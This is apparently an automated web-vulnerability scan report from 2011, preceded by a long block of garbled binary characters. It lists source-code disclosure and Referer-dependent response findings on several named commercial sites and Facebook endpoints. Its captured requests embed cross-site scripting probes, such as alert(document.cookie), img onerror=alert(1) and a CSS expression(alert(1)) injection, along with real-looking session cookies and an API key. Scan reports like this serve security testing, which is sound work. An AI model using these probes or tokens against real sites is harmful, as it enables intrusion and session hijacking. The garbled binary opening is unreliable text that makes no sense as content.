..)eGr....fR!KG.]PM2....!...........M[.TQ<...')!...?.....    .-.+^.4.....+.....R7.I...iJ!..t.qN.J*.`...;.Z.P..Re..5'w...J.......?{Yi5..k.|..8f..a.#.d=....9|..o..*}....6.    .qK..._A.    ..x.s.d.6....t0...T.kD."...(N\...nlP.vF.)..k<.............P.@.....&Nq.....d.......4.B....9......-M.}/R>.k.>.}c.<."...7&s. .A.................S..Y.h.../S.RY.....?}....,..x....}<2..$_...(..iOhs..F.i.~...ah.....].EG..>...{L.:)..5.......\..V.e...-...;.}.!..K.....(*...:>..]..Pn.\...oZE.'c...q3...o...Cd...whP..#.... /- .....%.P+.5.H..p..x.z..d.t    d.tFkE..MN....B.|...8.1U.}....Ck...4.U}A.y}.`q.....#...i{..3Wp...G.|.+;...L.+.........\z...~3..r..DL..e..M...M......~.F.x..<.. rl...$    .
`.X.3.G.....5.8.*...h.+....XV..|5`
........} 3..c.........`C.y..(.R..Mv.`._.>....HX..v._.._.s.:....<..
X.....fO.....d#.>.u..t...A..!.~....OkO.6.    ....xO..!C..i&...L.g!..]Ym.....o.y...%....\...n..zW.|.......yk...y|.........i<.L...q.t.....}......|........+......t.W..{.J...2gE...O...O.Q+HW\....xOVs.....
\g...GJ.uYYy.......gd.q1....RCsB.......^.w)>u.7..V.R..3......QQ.......1e..E    .t.7.Z?*...j.6.3.).g"...D...T....y.52R....+KF.\K....QKt...'....K.W.....5:...}5..2.._.......<.Z.....#A+..$.d.T...n.......{....dN.t!..!o/@.|xj.....u".PE...H.S;.2`.    .k6.......@ha..a.?l..........8R..w...v.. ...#R_[..2].M...".c...h.kV..\..C..\..u.s.....<....x...9...F....X...J..[.c.............Y..:-..MQ..K.gGd.C=.....v1.z.....R}u..vq.N.v....>l...TU...z...b...    .P\".c...w....f>.P.b. :.'..A.Q.3....].....
.H......*...:c.8}S0    ..........4..-$v&..3...G..L3.]`.v..{..5,....}!.9......5b...f`.U%...w+..o..    Y..e...>.u->.......K...    .?...D.n..t...d.A.V.n...<x..A.{(......\.....j..QX....|.;W.I...9..*. ....lW.,q....5X....0....jY....)...6.2...a.L.0.>..4W.o".......=$k..e....I.O.3J...f...........ea.x.    .c...>-V.BG.%.!..q.y.....#.d.Q.*s.t..7..]....=x..u....y.]...au.+.x...k[.E.e.4@wY.K.ss...d.P
zV.|>.....k.,...'K!..W..D....qB]Q.....8+F...D2.,|.-F..;...
....L.J.{a.....3m..@5.{Rm....9.2.K....+.d.w.\.Q.>;....8+.v.M0...#.n.iWF..]eA.....(.CjT......x.GP+.u.nY._..Q$7g&.......uPH.....c..:....I...Tw.O..f...:..EV)..8..+V .........a..z.i.
..o^....%.A..N!...#....t.    N.o.#.....7... ..j...F....&..Br.p....)..A.......+.....K9............m'm..e.^.,R.7.y..-.j0e....Ux..c7....=.;n.l..x.f...J..9.BO._D..#8...%.......)."F.!G......je......S:1.......b..P    .&.F...<.4Zj    j..0.......OdK.<."Zz#....V.LQ..|
..^...K7...........
}...)...j..^@Y|...Wb...V...Lo........+.Z..Q.q.T...IQ..v....s>.\...L.r.j.!..qe$    .DC..Pg.r.|.aNr...UY!....h.....&.6...E./......9.MO#}....A...(...'2c...zN...=.c.0. 024...........^..2.....)...R6Y...&..:.5|..v.....t...&.....7S.F.....h...v.\F...]$..Kb3..4nD...f.%.A....1b-..m.A.....&...}...k.Yp....f28..?..]6.y...$...9.. .nN.rcA.E`.0GNb.....;E..V.....%4*....m....e.;70.A..r.}.\.`...d....sqM?......H....~...pa..:..h....4.N.q|.c...Y!.kHs..H.Y.s.IeSZL............Yf9..G..*.=...X.|.d.Z..6.~,&._V...n.MV..m.9.y;...\Z.b.z.U.2....Z...l....K.X*..5..m......._i..7.V.PID.s.=...t-.H...+....T&......X......y2 .{......c...U..*..N....>6*(O^.p#.....A.({....7..L.....o...U.J...E.ZL.....s5.....[*sR...m<V...f<.C'...    .YFPi.Tqd-...<{..xAn..F.....>.0i..l.0.M...    ..An"u...V5.zmqDRnG~e6.CP.....1.`.4}.u...Q..<..d.C.n^.LZ...`./.62...pFS.pk.<...m.,oa.....}.rL...$L....K.o...<..z.xG....]    .....M.]).>....?8.......j..T    .>..
gJ.&.Z..,.......S.._.bPRs.}...
X..~0../Q....L.m...Nu.....&\...^.......g?81.Y..<.....5_...+O..C........UX.TYw8?.....J....t.$^.._.]4:....-..z.]......1...t..\.Q.D.....<}{..US..3..#.A..ET........^'......9...**W7..m..y...F..q{...-B(..|;..]..v(..|E.fV.o.N..    .Rf#    .......eX..?.b.... .}.S_........$...\...s.o..CW..x.&...M.Etv...U.[...yf.:...".n$.p....1.#.Jr.6.'...^.!.b.+...v.16...7.4hk.Q....j."..R.......i.;...qZ......qD.....L...A...a/.R+.[.F*..].A....J1.;.....MVwN.4@M.`g.Bm.....1...ec.......g...!q`IL*..0....4W.`y_.|I:.....<.cB\..!..
....x.7v......V...P.B.Tw......v.eh..wm..ge5....<j.*C.,.-.]I.}..'....'s@J.............{g.OlTrA.......W...Mo.....b9..k..+..{..w.:Gn..Sm.Hv).R........X.4W..(:x...Py..`...C.i.j..z. ..'z.......+....W....6..}.........wB.&.hk.X...'<.;P^AW.s..    L]F#.e.Z....S.E..C........d..5Xe];...].IAj5..4,Z.....IHh....S.".&.-k^...`as,~qC........A,~.B.[....x......u|T.{......t....4!. .:..
}0..Qd..2.*..>Aq    ......H}.+_.....|.wk.,./..........V;.".._]...fW#...h...t.....o_...D....n......[w....eG(k .9.0u.*.T.+...Ds.....#..V.+-.;.......Bs..B.C.^...s..    \V...!0.c.@K..lQT..bE...y
b.....+...L....WS@...T..3.'......w...`.07.u;..7    ...+..P.h.?..F.    pKP..h4jG}.v....a.....~.O[..3...5..t...-...|l..m..~.....B....}.m'........R...A)..._...|o....}(__N.........G.a............M7}cp......FN.h.....H....2~
..L.....13X<..RT..T.......:.*.vu.'.l...J@.J......u.......... e.r...L.2.h................B.`V.8dq(dL......)d..v.)dn...Q??a.4z..j....S.S..    ..v....o..x.H$(.\8.......a.?..........M...U[.A^...F..-P.[$....t..F...._...T.\EHf~.;........_......
`..8W.............a..c..A~y..y.....f...@.b......?.m..^b....U..Vg4..
H.N...K.e.......:..*`;w.q. ...?cs.J.....yO..A~......yIS.M..{....t.I7E*..)d.....F..uy...K9..#.1.6.90....."...Ku<"..F.M.u.+m(.6.o....3"...aM.r..4..!.........s.r$......TY...$4...ad.U.Q.-D..i..[^..V..{(H..w..J.A....k.C....^m.nn.`_:..k..@.P..>....s....o..y..p.....}.....P.?`.S..8.U.;.....RL....w..bK.W.)o:...    .}..x    .r..}-.&/..6.!;.7%......4........;.\...Q_...#....../D.z.&..*.T- ./Mm%.P....j...8...i..:.....r..R.4H...zf>.t.e#..L......]f._.h....:B...K4{4hw.....q.K.k..f.o....%c..I.s.UU....g....un..v.....b...Ny.G....H:.b".+.2...?...X....mL....{.....mc3.U.y$O6E{........B.-1....@P..Pa...}%La....<...\.9l.0.04............2.L.w.C6.....~...s...).Q.o...q=>.    ....    .:r.PK.t..iK.\uju.gt1t...q.1Ly.ko..-..O%..M.E....us'h...;..+/..d;..K.Ax...w6B.'.....!......C.8`...*..x...}.AK5.[.)..g.0..Z..^.
.>....~....
CJ...    Z|.~..%#..!..M.....".|......H\..........qOL.R.?..|...:.E..V.{...... .>E.pL..a..j.&(p...w..15.4.a.N.^B......`.i....Ahe.p/=!j.D..<..._..q..J.|$..;.8.w..%.....-....1W.=.X'y"..e#.....%>
. =C.?.    j2...8....]....    .j...6..&.h)...O
..92s..H.T..
.o.W..0.~<+.CP.. T.....8..f..9C......H..]..b-...%Q.]..?.3.&..(.P...3...?.G....K.5w^%{.....    AY....7Y............C.......D..-.H........hN.h.Y4...w..
...[SNIP]...

15.3. http://mobile.jackpotcity.com/js/genericfunctions.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://mobile.jackpotcity.com
Path:   /js/genericfunctions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/genericfunctions.js HTTP/1.1
Host: mobile.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://mobile.jackpotcity.com/?vp=jpc403475513
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral; ASP.NET_SessionId=1gj5cr2idrfdnk55bux11f55; CCH=JPM; FCVR=1412626935

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Dec 2010 13:03:53 GMT
Accept-Ranges: bytes
ETag: "3348f287a197cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:00 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 39505

...function highlightMenu() {
   var as = document.getElementById('navigation').getElementsByTagName('a');
   var url = window.location.href;
   for (i = 0; i < as.length; i++) {
       if (as[i].href == url
...[SNIP]...
overs';
   hide(last_tabs + '_data');
   show(tab_names + '_data');
   last_tabs = tab_names;
}

function signup(tab) {
   show_next('tab1');
   show_nexts(tab);
   //show_nexts('tab1a');
   //show_nexts('<%=Session["tabToshow"]%>');
}
function signupFooter(tab) {
   if (document.getElementById('tabLoading') != null) {
       hide('tabLoading');
   }

   last_tabs = tab;
}

function gettingstarted() {
   show_next('tab2');
   show
...[SNIP]...

15.4. http://www.agame.com/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.agame.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET / HTTP/1.1
Host: www.agame.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Vary: Accept-Encoding
Cache-Control: max-age=14400
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:48:20 GMT
Expires: Fri, 04 Feb 2011 00:24:20 GMT
Connection: close
Last-Modified: Thu, 03 Feb 2011 20:24:20 GMT
Content-Length: 158082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<span class="popup_title <%=titleIcon%>"><%=title%><%=closelink%></span>
...[SNIP]...
<span class="popup_title <%=titleIcon%>"><%=title%></span><%=closelink%></div>
...[SNIP]...
<span class="popup_title <%=titleIcon%>"><%=title%></span><%=closelink%></div>
...[SNIP]...
<span class="popup_title <%=titleIcon%>"><%=title%></span><%=closelink%></div>
...[SNIP]...
<a href="#" class="popup_blue_button"><%=blueButtonText%><span>
...[SNIP]...
<div class="popup_content_simple <%=highlightclass%>"><span class="popup_content_header"><%=header%></span>
...[SNIP]...
<div class="popup_content_doublelined <%=highlightclass%>"><span class="popup_content_header"><%=header%></span><br><span class="popup_content_info"><%=info%></span>
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<p class="<%=accountType%>"><%=info%></p>
...[SNIP]...
<p class="<%=accountType%>"><%=info%></p>
...[SNIP]...
<div id="hrl_<%=no%>" class="<%=extraClass%> tr">
...[SNIP]...
<input id="usr_<%=username%>"type="checkbox" checked="true" />
...[SNIP]...
<a href="<%=userprofilelink%>">
               <img width="50" height="50" border="0" src="<%=(no%2==1?"http://www11.agame.com/img/_/profile/avatar_border_small_white.gif":"http://www11.agame.com/img/_/profile/avatar_border_small_blue.gif")%>" style="background-image: url(<%=avatar%>);" alt="<%=username%>" />
...[SNIP]...
<a href="<%=userprofilelink%>"><%=username%></a></p>
       <p class="usernameHolder"><%=name%></p>
...[SNIP]...
<div class="tr <%=extraClass%>">
...[SNIP]...
<div class="td harvestListName">
       <%=name%>
   </div>
   <div class="td harvestEmail">
       <%=email%>
   </div>
...[SNIP]...

15.5. http://www.games.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.games.co.uk
Path:   /

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET / HTTP/1.1
Host: www.games.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Vary: Accept-Encoding
Cache-Control: max-age=14400
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:49:32 GMT
Expires: Thu, 03 Feb 2011 19:17:35 GMT
Connection: close
Last-Modified: Thu, 03 Feb 2011 15:17:35 GMT
Content-Length: 110170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<div class="popup_container <%=extraClass%>">
...[SNIP]...
<h2 class="blue-title tc-editprofile-hdr"><%=title%></h2>
...[SNIP]...
<div class="link-right-top"><%=closelink%></div>
...[SNIP]...
</div>
<%= setUpPopUp() %>
-->
...[SNIP]...
<span><%=blueButtonText%></span>
...[SNIP]...
<span><%=bottomLinkText%></span>
...[SNIP]...
<span><%=blueButtonText%></span>
...[SNIP]...
<div class="popup_content_simple <%=highlightclass%>"><%=header%></div>
...[SNIP]...
<span class="popup_confirmation_header"><%=header%></span><br><span class="popup_confirmation_info"><%=info%></span>
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<div class="popup_content_report <%=highlightclass%>">
...[SNIP]...
<p class="<%=accountType%>"><%=info%></p>
...[SNIP]...
<p class="<%=accountType%>"><%=info%></p>
...[SNIP]...
<div><%=question%><div>
...[SNIP]...
<label class="standard-forms tc-password-lbl" for="enter_password"><%=label%></label>
...[SNIP]...
<!--
<%=question%>
-->
...[SNIP]...
<!--
<%=information%>
-->
...[SNIP]...

15.6. http://www.jackpotcity.com/js/genericfunctions.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.jackpotcity.com
Path:   /js/genericfunctions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/genericfunctions.js HTTP/1.1
Host: www.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.jackpotcity.com/online-casino/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wa3qlqzjtebv1q45odolquvj; CCH=JPC; FCVR=1412626858

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 01 Feb 2011 13:00:08 GMT
Accept-Ranges: bytes
ETag: "0fcc0f3fc2cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:23 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 74877

...var alertTimerId = 0;

function SwitchImages(image1id, image2id) {

var e1 = document.getElementById(image1id);
e1.style.display = 'none';

var e2 = document.getElementById(image
...[SNIP]...
t_tabs + '_data');
show(tab_names + '_data');
last_tabs = tab_names;
}

function signup(tab) {
show_next('tab1');
show_nexts(tab);
//show_nexts('tab1a');
//show_nexts('<%=Session["tabToshow"]%>');
}
function signupFooter(tab) {
if (document.getElementById('tabLoading') != null) {
hide('tabLoading');
}

last_tabs = tab;
}

function gettingstarted() {
show_ne
...[SNIP]...

15.7. http://www.tucows.com/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:50:37 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jan 2010 16:49:48 GMT
ETag: "777b1-adf-47d8741fd0300"
Accept-Ranges: bytes
Content-Length: 2783
Cache-Control: max-age=604800
Expires: Thu, 10 Feb 2011 20:50:37 GMT
Content-Type: application/javascript

function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {

   var bAsync = (bAsync == null ? true : bAsync);
   var req;
   
   try {
       req = new XMLHttpRequest();                                                    /* e.g. Firefox
...[SNIP]...
or request variable. For example,
// assuming you used javascript to set a cookie called "php_array"
// to the value of a javascript array then you can restore the cookie
// from PHP like this:
// <?php
// session_start();
// $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array'])));
// print_r ($my_array);
// ?>

// /* This automatically converts both keys and values to strings.
// The return string is not URL escaped, so you must call the
// Javascript "escape()" function before you pass this string to PHP. *
...[SNIP]...

16. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.



16.1. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=f8c7347543a5d2e2d76864f96079fa3d&extern=0&channel=http%3A%2F%2Fwww.veoh.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 21:24:21 GMT
Content-Length: 1236

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"veoh.com","channel":"http:\/\/www.veoh.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.veoh.com\/browse\/videos\/category\/action_adventure2e455\u00253Cimg\u002520src\u00253da\u002520onerror\u00253dalert(1)\u00253Ecd67645eb41\/watch\/v18978294NGnK88j8\/x22","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=f8c7347543a5d2e2d76864f96079fa3d&extern=0&channel=http%3A%2F%2Fwww.veoh.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 21:24:56 GMT
Content-Length: 1056

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"veoh.com","channel":"http:\/\/www.veoh.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

16.2. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/1d612 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.smartdraw.com/1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 21:24:19 GMT
Content-Length: 9346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d4b1d03578d63848898456" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=smartdraw.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.smartdraw.com%2F1d612%252522style%25253d%252522x%25253aexpression%252528alert%2525281%252529%252529%2525220eedd2683a3%2Fx22&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/1d612 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 21:25:03 GMT
Content-Length: 9020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d4b1d2f199147836388353" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span 